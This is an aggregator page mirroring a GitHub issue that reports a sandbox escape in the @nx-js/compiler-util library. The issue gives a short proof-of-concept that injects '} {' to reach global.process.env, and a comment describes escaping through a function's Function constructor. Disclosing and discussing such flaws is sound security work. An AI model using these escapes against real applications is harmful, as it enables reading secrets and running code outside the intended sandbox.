Lightrun
question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Vulnerability

See original GitHub issue

You can escape the sandbox using something like this:

const compiler = require('@nx-js/compiler-util');

const code = compiler.compileCode('} { return global.process.env.LOGNAME');
const user = code({});
console.log(user);

Issue Analytics

  • State:open
  • Created 3 years ago
  • Comments:14

github_iconTop GitHub Comments

1reaction
nerochiarocommented, Oct 7, 2020

Also wouldn’t it be also possible to escape the sandbox by simply getting hold of any function, reaching its constructor (i.e. Function), then using it to create a new un-sandboxed evaluation. See this for example: https://runkit.com/feralgeometry/5f7dcaf7cc4527001aed3119

1reaction
natariuscommented, Jul 30, 2020

yeah, seems like typescript transpiling catches this!

here are the options I used:

const compilerOptions = {
            allowJs: true,
            target: ts.ScriptTarget.ES2020,
            lib: ["ES2020"],
            module: ts.ModuleKind.CommonJS,
            noEmitOnError: true,
        };


         const jsCode = ts.transpileModule(tsCode, {compilerOptions});
         return jsCode.outputText;
Read more comments on GitHub >

github_iconTop Results From Across the Web

Vulnerability Definition & Meaning - Dictionary.com
vulnerability · openness or susceptibility to attack or harm: · willingness to show emotion or to allow one's weaknesses to be seen or...
Read more >
Vulnerability: The Key to Better Relationships - Mark Manson
Vulnerability is consciously choosing to NOT hide your emotions or desires from others. That's it. You just freely express your thoughts, feelings, desires,...
Read more >
Vulnerability - Wikipedia
Vulnerability refers to "the quality or state of being exposed to the possibility of being attacked or harmed, either physically or emotionally.".
Read more >
VULNERABILITY definition | Cambridge English Dictionary
Meaning of vulnerability in English ... the quality of being vulnerable (= able to be easily hurt, influenced, or attacked), or something that...
Read more >
Brene Brown: How Vulnerability Can Make Our Lives Better
Vulnerability is basically uncertainty, risk, and emotional exposure. I was raised in a “get 'er done” and “suck it up” family and culture...
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found
Previous page

Go test only checks main_test.go

Next page

Bypass nx-compile 2.0 with hoisting